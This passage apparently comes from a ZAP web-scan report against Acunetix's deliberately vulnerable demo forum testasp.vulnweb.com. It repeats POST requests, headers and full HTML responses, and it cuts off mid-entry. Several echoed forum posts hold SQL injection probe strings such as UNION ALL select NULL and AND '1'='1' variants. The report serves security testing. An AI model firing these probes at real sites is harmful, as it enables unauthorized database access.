class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3086 |
| Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3086 |
| Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3067 |
| Response Body - size: 3,067 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3066 |
| Response Body - size: 3,066 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3375 |
| Response Body - size: 3,375 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot galleries, daily updated collections </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot galleries, daily updated collections </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by 